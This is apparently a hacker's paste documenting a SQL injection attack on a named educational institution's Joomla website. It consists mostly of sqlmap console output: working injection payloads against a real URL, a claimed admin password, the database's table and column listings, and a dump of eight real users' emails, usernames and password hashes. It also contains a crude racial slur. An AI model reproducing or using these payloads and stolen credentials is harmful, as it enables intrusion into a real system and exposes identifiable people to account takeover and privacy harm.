.-""""-. .-""""-. / \ / \ /_ _\ /_ _\ // \ / \\ // \ / \\ |\__\ /__/| |\__\ /__/| \ || / \ || / \ / \ / \ __ / \ __ / '.__.' '.__.' | | | | jgs | | | | this url is vuln probably a known issue but its here for you anyhow http://www.pit.edu.ph/index.php?option=com_content&view=article&id=87(injectable here 0 day?)&Itemid=93 prolly nothing as im not big into joomla shit yet but anyways nice hacking with you world lol fucking admin pass to joomla is 123456 but sadly no go have fun zero out aliens in kitty meow nigguh Database: pipedu_pitweb [147 tables] +-----------------------------------------+ | jos_admintools_acl | | jos_admintools_adminiplist | | jos_admintools_badwords | | jos_admintools_cookies | | jos_admintools_customperms | | jos_admintools_filescache | | jos_admintools_ipautoban | | jos_admintools_ipautobanhistory | | jos_admintools_ipblock | | jos_admintools_log | | jos_admintools_profiles | | jos_admintools_redirects | | jos_admintools_scanalerts | | jos_admintools_scans | | jos_admintools_storage | | jos_admintools_wafexceptions | | jos_admintools_waftemplates | | jos_advancedmodules | | jos_ak_profiles | | jos_ak_stats | | jos_ak_storage | | jos_akeeba_common | | jos_assets | | jos_associations | | jos_banner_clients | | jos_banner_tracks | | jos_banners | | jos_categories | | jos_contact_details | | jos_content | | jos_content_frontpage | | jos_content_rating | | jos_content_types | | jos_contentitem_tag_map | | jos_core_log_searches | | jos_extensions | | jos_finder_filters | | jos_finder_links | | jos_finder_links_terms0 | | jos_finder_links_terms1 | | jos_finder_links_terms2 | | jos_finder_links_terms3 | | jos_finder_links_terms4 | | jos_finder_links_terms5 | | jos_finder_links_terms6 | | jos_finder_links_terms7 | | jos_finder_links_terms8 | | jos_finder_links_terms9 | | jos_finder_links_termsa | | jos_finder_links_termsb | | jos_finder_links_termsc | | jos_finder_links_termsd | | jos_finder_links_termse | | jos_finder_links_termsf | | jos_finder_taxonomy | | jos_finder_taxonomy_map | | jos_finder_terms | | jos_finder_terms_common | | jos_finder_tokens | | jos_finder_tokens_aggregate | | jos_finder_types | | jos_jdownloads_categories | | jos_jdownloads_config | | jos_jdownloads_files | | jos_jdownloads_licenses | | jos_jdownloads_logs | | jos_jdownloads_ratings | | jos_jdownloads_templates | | jos_jdownloads_usergroups_limits | | jos_jev_defaults | | jos_jev_users | | jos_jevents_catmap | | jos_jevents_exception | | jos_jevents_filtermap | | jos_jevents_icsfile | | jos_jevents_repetition | | jos_jevents_rrule | | jos_jevents_vevdetail | | jos_jevents_vevent | | jos_jupgradepro_categories | | jos_jupgradepro_default_categories | | jos_jupgradepro_default_menus | | jos_jupgradepro_errors | | jos_jupgradepro_extensions | | jos_jupgradepro_extensions_tables | | jos_jupgradepro_files_images | | jos_jupgradepro_files_media | | jos_jupgradepro_files_templates | | jos_jupgradepro_menus | | jos_jupgradepro_modules | | jos_jupgradepro_steps | | jos_jupgradepro_version | | jos_languages | | jos_menu | | jos_menu_types | | jos_messages | | jos_messages_cfg | | jos_modules | | jos_modules_menu | | jos_newsfeeds | | jos_overrider | | jos_phocadownload | | jos_phocadownload_categories | | jos_phocadownload_file_votes | | jos_phocadownload_file_votes_statistics | | jos_phocadownload_layout | | jos_phocadownload_licenses | | jos_phocadownload_logging | | jos_phocadownload_styles | | jos_phocadownload_tags | | jos_phocadownload_tags_ref | | jos_phocadownload_user_stat | | jos_phocagallery | | jos_phocagallery_categories | | jos_phocagallery_comments | | jos_phocagallery_fb_users | | jos_phocagallery_img_comments | | jos_phocagallery_img_votes | | jos_phocagallery_img_votes_statistics | | jos_phocagallery_styles | | jos_phocagallery_tags | | jos_phocagallery_tags_ref | | jos_phocagallery_user | | jos_phocagallery_votes | | jos_phocagallery_votes_statistics | | jos_postinstall_messages | | jos_redirect_links | | jos_schemas | | jos_session | | jos_tags | | jos_template_styles | | jos_ucm_base | | jos_ucm_content | | jos_ucm_history | | jos_update_sites | | jos_update_sites_extensions | | jos_updates | | jos_user_keys | | jos_user_notes | | jos_user_profiles | | jos_user_usergroup_map | | jos_usergroups | | jos_users | | jos_viewlevels | | jos_weblinks | | jos_xmap_items | | jos_xmap_sitemap | +-----------------------------------------+ [*] shutting down at 16:05:08 C:\Users\Administrator\Desktop\sqlmap>sqlmap.py -u "http://www.pit.edu.ph/index. php?option=com_content&view=article&id=87&Itemid=93" -D jos_users --tables sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon sible for any misuse or damage caused by this program [*] starting at 16:47:49 [16:47:49] [INFO] resuming back-end DBMS 'mysql' [16:47:49] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: id Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY claus e (RLIKE) Payload: option=com_content&view=article&id=87 RLIKE (SELECT (CASE WHEN (247 0=2470) THEN 87 ELSE 0x28 END))&Itemid=93 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: option=com_content&view=article&id=87 AND (SELECT 1943 FROM(SELECT COUNT(*),CONCAT(0x7172727271,(SELECT (CASE WHEN (1943=1943) THEN 1 ELSE 0 END)), 0x717a717371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=93 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: option=com_content&view=article&id=87 AND SLEEP(5)&Itemid=93 --- [16:47:52] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.3.29 back-end DBMS: MySQL 5.0 [16:47:52] [INFO] fetching tables for database: 'jos_users' [16:47:54] [WARNING] reflective value(s) found and filtering out [16:47:54] [INFO] fetching number of tables for database 'jos_users' [16:47:54] [WARNING] running in a single-thread mode. Please consider usage of o ption '--threads' for faster data retrieval [16:47:54] [INFO] retrieved: 0 [16:48:03] [WARNING] database 'jos_users' appears to be empty [16:48:03] [ERROR] unable to retrieve the table names for any database do you want to use common table existence check? [y/N/q] n No tables found [16:48:43] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 6 times [16:48:43] [INFO] fetched data logged to text files under 'C:\Users\Administrato r\Desktop\sqlmap\output\www.pit.edu.ph' [*] shutting down at 16:48:43 C:\Users\Administrator\Desktop\sqlmap>sqlmap.py -u "http://www.pit.edu.ph/index. php?option=com_content&view=article&id=87&Itemid=93" -D pipedu_pitweb -T jos_use rs --column sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon sible for any misuse or damage caused by this program [*] starting at 16:49:23 [16:49:23] [INFO] resuming back-end DBMS 'mysql' [16:49:23] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: id Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY claus e (RLIKE) Payload: option=com_content&view=article&id=87 RLIKE (SELECT (CASE WHEN (247 0=2470) THEN 87 ELSE 0x28 END))&Itemid=93 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: option=com_content&view=article&id=87 AND (SELECT 1943 FROM(SELECT COUNT(*),CONCAT(0x7172727271,(SELECT (CASE WHEN (1943=1943) THEN 1 ELSE 0 END)), 0x717a717371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=93 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: option=com_content&view=article&id=87 AND SLEEP(5)&Itemid=93 --- [16:49:24] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.3.29 back-end DBMS: MySQL 5.0 [16:49:24] [INFO] fetching columns for table 'jos_users' in database 'pipedu_pit web' [16:49:25] [WARNING] reflective value(s) found and filtering out [16:49:25] [INFO] the SQL query used returns 16 entries [16:49:26] [INFO] retrieved: id [16:49:27] [INFO] retrieved: int(11) [16:49:28] [INFO] retrieved: name [16:49:29] [INFO] retrieved: varchar(255) [16:49:31] [INFO] retrieved: username [16:49:32] [INFO] retrieved: varchar(150) [16:49:33] [INFO] retrieved: email [16:49:34] [INFO] retrieved: varchar(100) [16:49:35] [INFO] retrieved: password [16:49:36] [INFO] retrieved: varchar(100) [16:49:37] [INFO] retrieved: block [16:49:38] [INFO] retrieved: tinyint(4) [16:49:39] [INFO] retrieved: sendEmail [16:49:40] [INFO] retrieved: tinyint(4) [16:49:41] [INFO] retrieved: registerDate [16:49:42] [INFO] retrieved: datetime [16:49:43] [INFO] retrieved: lastvisitDate [16:49:44] [INFO] retrieved: datetime [16:49:45] [INFO] retrieved: activation [16:49:46] [INFO] retrieved: varchar(100) [16:49:48] [INFO] retrieved: params [16:49:49] [INFO] retrieved: text [16:49:50] [INFO] retrieved: lastResetTime [16:49:51] [INFO] retrieved: datetime [16:49:52] [INFO] retrieved: resetCount [16:49:53] [INFO] retrieved: int(11) [16:49:54] [INFO] retrieved: otpKey [16:49:55] [INFO] retrieved: varchar(1000) [16:49:56] [INFO] retrieved: otep [16:49:57] [INFO] retrieved: varchar(1000) [16:49:58] [INFO] retrieved: requireReset [16:49:59] [INFO] retrieved: tinyint(4) Database: pipedu_pitweb Table: jos_users [16 columns] +---------------+---------------+ | Column | Type | +---------------+---------------+ | activation | varchar(100) | | block | tinyint(4) | | email | varchar(100) | | id | int(11) | | lastResetTime | datetime | | lastvisitDate | datetime | | name | varchar(255) | | otep | varchar(1000) | | otpKey | varchar(1000) | | params | text | | password | varchar(100) | | registerDate | datetime | | requireReset | tinyint(4) | | resetCount | int(11) | | sendEmail | tinyint(4) | | username | varchar(150) | +---------------+---------------+ [16:50:00] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 33 times [16:50:00] [INFO] fetched data logged to text files under 'C:\Users\Administrato r\Desktop\sqlmap\output\www.pit.edu.ph' [*] shutting down at 16:50:00 C:\Users\Administrator\Desktop\sqlmap>sqlmap.py -u "http://www.pit.edu.ph/index. php?option=com_content&view=article&id=87&Itemid=93" -D pipedu_pitweb -T jos_use rs -C email,username,password --dump --threads 10 sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon sible for any misuse or damage caused by this program [*] starting at 16:53:55 [16:53:55] [INFO] resuming back-end DBMS 'mysql' [16:53:55] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: id Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY claus e (RLIKE) Payload: option=com_content&view=article&id=87 RLIKE (SELECT (CASE WHEN (247 0=2470) THEN 87 ELSE 0x28 END))&Itemid=93 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: option=com_content&view=article&id=87 AND (SELECT 1943 FROM(SELECT COUNT(*),CONCAT(0x7172727271,(SELECT (CASE WHEN (1943=1943) THEN 1 ELSE 0 END)), 0x717a717371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=93 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: option=com_content&view=article&id=87 AND SLEEP(5)&Itemid=93 --- [16:53:56] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.3.29 back-end DBMS: MySQL 5.0 [16:53:56] [INFO] fetching columns 'email, password, username' for table 'jos_us ers' in database 'pipedu_pitweb' [16:54:00] [WARNING] reflective value(s) found and filtering out [16:54:00] [INFO] the SQL query used returns 3 entries [16:54:00] [INFO] starting 3 threads [16:54:01] [INFO] retrieved: username [16:54:01] [INFO] retrieved: password [16:54:01] [INFO] retrieved: email [16:54:03] [INFO] retrieved: varchar(150) [16:54:03] [INFO] retrieved: varchar(100) [16:54:04] [INFO] retrieved: varchar(100) [16:54:05] [INFO] fetching entries of column(s) 'email, password, username' for table 'jos_users' in database 'pipedu_pitweb' [16:54:06] [INFO] the SQL query used returns 8 entries [16:54:06] [INFO] starting 8 threads [16:54:08] [INFO] retrieved: amymaupo2@gmail.com [16:54:08] [INFO] retrieved: joshua.paloma@pit.edu.ph [16:54:08] [INFO] retrieved: rennonkent.malbacias@pit.edu.ph [16:54:08] [INFO] retrieved: amymaupo@yahoo.com [16:54:08] [INFO] retrieved: pkcare@yahoo.com [16:54:08] [INFO] retrieved: garymolina@gmail.com [16:54:08] [INFO] retrieved: ronaldjames_diansay@yahoo.com [16:54:10] [INFO] retrieved: porchiauy@yahoo.com [16:54:11] [INFO] retrieved: $2y$10$DX5I.B3DvgKWAkmMgSN/5.asNGmZcQTIX7WijJ/MZeUk d9R5BtAwa [16:54:11] [INFO] retrieved: $2y$10$cWSx.0n2LwYuseHiVzTqcOWepcCEjzd3Xpbsfh1LHpsn TYptESwuq [16:54:11] [INFO] retrieved: $2y$10$cjY8gvyVKxHMj11SiPazj.6/hbLtAXSOEy7mFn9llCh1 YaSKKcGFq [16:54:12] [INFO] retrieved: 831b56296430bba11ee2f550bac45ea3:E7xybX9o1LBVcnnKSc x0HcjcvPLTpuOG [16:54:12] [INFO] retrieved: 43506132b1b0d6edd3fc009e6a480981:oLGjjU2d6V8z02NsMh HlfQryBqn4LsHI [16:54:12] [INFO] retrieved: 23e100f72f345b7918827869ba8f447a:FCU4pQ1uem2fZ0FCAl 4hQgsqV6Xn3tjI [16:54:12] [INFO] retrieved: 60fa85bf0e7044ba5a503b61f22e2e0e:N7NXJbtYIst5WuHjke qc0vFrw1v6J9cZ [16:54:12] [INFO] retrieved: pitMIS [16:54:12] [INFO] retrieved: MISadmin [16:54:12] [INFO] retrieved: misadmin2 [16:54:13] [INFO] retrieved: admin [16:54:13] [INFO] retrieved: pkcare [16:54:13] [INFO] retrieved: ronron [16:54:14] [INFO] retrieved: 8f1566a037dae5da35261e2edd8a196f:Aq7beDpAWSxolTu5Et 0dL2xHsDAR2bnI [16:54:14] [INFO] retrieved: gary [16:54:15] [INFO] retrieved: porchia [16:54:15] [INFO] analyzing table dump for possible password hashes Database: pipedu_pitweb Table: jos_users [8 entries] +---------------------------------+-----------+--------------------------------- ----------------------------------+ | email | username | password | +---------------------------------+-----------+--------------------------------- ----------------------------------+ | amymaupo2@gmail.com | pitMIS | $2y$10$DX5I.B3DvgKWAkmMgSN/5.asN GmZcQTIX7WijJ/MZeUkd9R5BtAwa | | amymaupo@yahoo.com | admin | 831b56296430bba11ee2f550bac45ea3 :E7xybX9o1LBVcnnKScx0HcjcvPLTpuOG | | garymolina@gmail.com | gary | 60fa85bf0e7044ba5a503b61f22e2e0e :N7NXJbtYIst5WuHjkeqc0vFrw1v6J9cZ | | joshua.paloma@pit.edu.ph | MISadmin | $2y$10$cjY8gvyVKxHMj11SiPazj.6/h bLtAXSOEy7mFn9llCh1YaSKKcGFq | | pkcare@yahoo.com | pkcare | 43506132b1b0d6edd3fc009e6a480981 :oLGjjU2d6V8z02NsMhHlfQryBqn4LsHI | | porchiauy@yahoo.com | porchia | 8f1566a037dae5da35261e2edd8a196f :Aq7beDpAWSxolTu5Et0dL2xHsDAR2bnI | | rennonkent.malbacias@pit.edu.ph | misadmin2 | $2y$10$cWSx.0n2LwYuseHiVzTqcOWep cCEjzd3Xpbsfh1LHpsnTYptESwuq | | ronaldjames_diansay@yahoo.com | ronron | 23e100f72f345b7918827869ba8f447a :FCU4pQ1uem2fZ0FCAl4hQgsqV6Xn3tjI | +---------------------------------+-----------+--------------------------------- ----------------------------------+ [16:54:15] [INFO] table 'pipedu_pitweb.jos_users' dumped to CSV file 'C:\Users\A dministrator\Desktop\sqlmap\output\www.pit.edu.ph\dump\pipedu_pitweb\jos_users.c sv' [16:54:15] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 40 times [16:54:15] [INFO] fetched data logged to text files under 'C:\Users\Administrato r\Desktop\sqlmap\output\www.pit.edu.ph' [*] shutting down at 16:54:15 C:\Users\Administrator\Desktop\sqlmap>